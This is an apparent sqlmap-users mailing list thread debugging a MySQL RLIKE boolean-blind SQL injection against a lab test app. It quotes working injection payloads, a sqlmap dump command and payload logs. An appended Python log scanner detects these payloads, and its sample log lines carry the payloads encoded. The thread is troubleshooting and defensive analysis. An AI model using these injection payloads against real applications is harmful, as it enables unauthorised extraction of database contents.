BTW I hope this doesn’t come across as it being a problem with sqlmap, I think it is a problem with the local system’s mysql instance, just trying to figure out why an RLIKE injection would allow enumeration of DATABASE() but not from the users table. I figured I would ask this list if anyone else had experienced similar, though.
‘admin’ is the only user in the database, so I know it is the only row that could be returned, but order by presents the same results…

mysql> select ORD(MID((SELECT `name` from users order by id LIMIT 0,1),1,1));
+-----------------------------------------------------------------+
| ORD(MID((SELECT `name` from users order by id LIMIT 0,1),1,1))  |
+-----------------------------------------------------------------+
|                                                              97 |
+-----------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users order by id LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
Empty set (0.00 sec)

Might just need to say it is some quirk on the exploitable system’s MySQL instance… It’s a little bizarre.

mysql Ver 14.14 Distrib 5.6.19, for Linux (x86_64) using EditLine wrapper

> On Feb 22, 2015, at 7:31 AM, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
>
> Hi again.
>
> I believe that we have a problem here. I am trying to reproduce your "problem" and can't do it:
>
> mysql> select * from users;
> +----+--------+----------------------------------+
> | id | name   | surname                          |
> +----+--------+----------------------------------+
> |  1 | admin  | blissett                         |
> |  2 | fluffy | bunny                            |
> |  3 | wu     | ming                             |
> |  4 | NULL   | nameisnull                       |
> |  5 | md5    | 098f6bcd4621d373cade4e832627b4f6 |
> +----+--------+----------------------------------+
> 5 rows in set (0.00 sec)
>
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> Empty set (0.00 sec)
>
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>
> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>
> mysql> SELECT `name` from users LIMIT 0,1;
> +-------+
> | name  |
> +-------+
> | admin |
> +-------+
> 1 row in set (0.00 sec)
>
> mysql>
>
> I believe that you have a problem with order of returned results. You can't expect query results to be returned in a deterministic way. That's just how the DBMS works.
>
> Also, that's why we use ORDER BY wherever we can, to skip this kind of problem. If you take a look into -v 3 of your run in sqlmap you'll see that it uses "ORDER BY", while you don't use it in your case:
>
> [14:30:20] [PAYLOAD] 1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT IFNULL(CAST(name AS CHAR),0x20) FROM testdb.users ORDER BY id LIMIT 0,1),6,1))>2) THEN 1 ELSE 0x28 END))
>
> Kind regards,
> Miroslav Stampar
>
> On Sun, Feb 22, 2015 at 2:16 PM, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
> "I only bring it up because sqlmap has no problem grabbing the database with rlike but can't enumerate the values from the user table"
>
> $ python sqlmap.py -u "http://192.168.223.129/sqlmap/mysql/get_int.php?id=1" --batch --test-filter="RLIKE" --dump -D testdb -T users
>
> ...
>
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Parameter: id (GET)
>     Type: boolean-based blind
>     Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
>     Payload: id=1 RLIKE (SELECT (CASE WHEN (7668=7668) THEN 1 ELSE 0x28 END))
> ---
> ...
>
> [14:14:52] [INFO] postprocessing table dump
> Database: testdb
> Table: users
> [5 entries]
> +----+--------+-----------------------------------------+
> | id | name   | surname                                 |
> +----+--------+-----------------------------------------+
> | 1  | luther | blissett                                |
> | 2  | fluffy | bunny                                   |
> | 3  | wu     | ming                                    |
> | 4  | NULL   | nameisnull                              |
> | 5  | md5    | 098f6bcd4621d373cade4e832627b4f6 (test) |
> +----+--------+-----------------------------------------+
>
> On Sat, Feb 21, 2015 at 10:59 PM, Brandon Perry <bperry.volat...@gmail.com> wrote:
> Right, in the sql statement where I select 'a', the ord of this is not greater than 112, and it fails as expected with parens not balanced.
>
> The query below this that selects the first name from users should be functionally equivalent to select 'a', as mid is used to select the first character of the first username, which is 'admin' as shown, but this statement does not fail as expected.
>
> I am at a loss as to why the latter does not fail when the inner select is functionally equivalent to select 'a', and the former fails as expected.
>
> I only bring it up because sqlmap has no problem grabbing the database with rlike but can't enumerate the values from the user table, and I logged into the server as root to try to figure out what the issue might be and this seems to be the root cause.
>
> Sent from a phone
>
> On Feb 21, 2015, at 3:35 PM, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
>
>> Hi.
>>
>> Maybe I'm mistaken, but you are looking at this RLIKE wrong. Its function here (in your case) is to PROVOKE errors on False, and that's exactly what's going on here.
>>
>> In case of True, RLIKE is called with perfectly valid 0x7474747474, while in case of False it's called with erroneous regexp 0x28 ('parentheses not balanced').
>>
>> Bye
>>
>> On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bperry.volat...@gmail.com> wrote:
>> Have an injection that I can use RLIKE to induce a 500 error, but it only works in some circumstances. Enumerating the DATABASE() value works, as well as the current user, but enumerating values from the database tables fails. Even as root on the box, the RLIKE query fails to throw an exception when attempting to use RLIKE in some instances.
>>
>> As you can see in the output below, the user can select the first name value from the users table (which is ‘admin’). When using RLIKE to test the first character returned with DATABASE() (a ‘p’), you get the parentheses not balanced exception as expected. You also get this exception when simply selecting ‘a’.
>>
>> But when you select the first row from the users table and grab the first character (an ‘a’), no exception is thrown and an empty result set is returned.
>>
>> Any thoughts?
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> Empty set (0.01 sec)
>>
>> mysql> SELECT `name` from users LIMIT 0,1;
>> +-------+
>> | name  |
>> +-------+
>> | admin |
>> +-------+
>> 1 row in set (0.00 sec)
>>
>> mysql>
>>
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
> --
> Miroslav Stampar
> http://about.me/stamparm
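The RLIKE payloads quoted in this thread (a CASE that yields a valid regexp on TRUE and the broken one 0x28 on FALSE, so only one branch makes MySQL raise error 1139) leave a recognisable trace in web server logs, and the pairing of near-identical requests answered with 200 and 500 is the signal a defender can alert on. The Python below is an added example, not code from the thread or from sqlmap: it URL-decodes the request field of constructed Combined Log Format lines (the IPs, timestamps and sizes are made up) and labels the detection probe and the ORD(MID((SELECT ...))) extraction form separately.

```python
import re
from urllib.parse import unquote_plus

# Shape of the payloads shown in the thread: RLIKE whose pattern is a CASE that
# yields a valid regexp when the condition is TRUE and the invalid one 0x28 ("(")
# when it is FALSE, so only the FALSE branch makes MySQL raise error 1139.
RLIKE_CASE = re.compile(
    r"\bRLIKE\s*\(\s*SELECT\s*\(\s*CASE\s+WHEN\b.*?\bTHEN\b.*?\bELSE\s+0x28\s+END\s*\)\s*\)",
    re.IGNORECASE)
# The character-extraction form: ORD(MID((SELECT ...),pos,1)) > k, one request per comparison.
ORD_MID = re.compile(r"\bORD\s*\(\s*MID\s*\(\s*\(\s*SELECT\b", re.IGNORECASE)
# Combined Log Format; the request URL is logged still URL-encoded.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')

def classify_request(url):
    """Label one request URL, or return None when it carries no such payload."""
    decoded = unquote_plus(url)          # %28 -> "(", + -> " ", %3E -> ">", ...
    if not RLIKE_CASE.search(decoded):
        return None
    if ORD_MID.search(decoded):
        return "rlike-blind-extraction"  # dumping data character by character
    return "rlike-blind-probe"           # detection probe such as CASE WHEN (7668=7668)

def scan_log(lines):
    """Return (client ip, label, http status) for every flagged request."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue                     # not a parseable access-log line
        label = classify_request(m.group("url"))
        if label:
            findings.append((m.group("ip"), label, int(m.group("status"))))
    return findings

# Constructed sample log (not real traffic): a clean request, the probe payload and the
# ORDER BY extraction payload quoted in the thread, then an unrelated request.
SAMPLE_LOG = [
    '192.168.223.1 - - [22/Feb/2015:14:14:50 +0100] "GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1" 200 512',
    '192.168.223.1 - - [22/Feb/2015:14:14:51 +0100] "GET /sqlmap/mysql/get_int.php?id=1+RLIKE+%28SELECT+%28CASE+WHEN+%287668%3D7668%29+THEN+1+ELSE+0x28+END%29%29 HTTP/1.1" 200 512',
    '192.168.223.1 - - [22/Feb/2015:14:14:52 +0100] "GET /sqlmap/mysql/get_int.php?id=1+RLIKE+%28SELECT+%28CASE+WHEN+%28ORD%28MID%28%28SELECT+IFNULL%28CAST%28name+AS+CHAR%29%2C0x20%29+FROM+testdb.users+ORDER+BY+id+LIMIT+0%2C1%29%2C6%2C1%29%29%3E2%29+THEN+1+ELSE+0x28+END%29%29 HTTP/1.1" 500 231',
    '10.0.0.7 - - [22/Feb/2015:14:15:03 +0100] "GET /search.php?q=things+i+like+%28a+lot%29 HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, label, status in scan_log(SAMPLE_LOG):
        print(ip, label, status)
```

Alerting on a single client that alternates 200 and 500 responses to URLs differing only inside the CASE condition catches the extraction phase even if the regexps are tuned for a different encoding of the same payload.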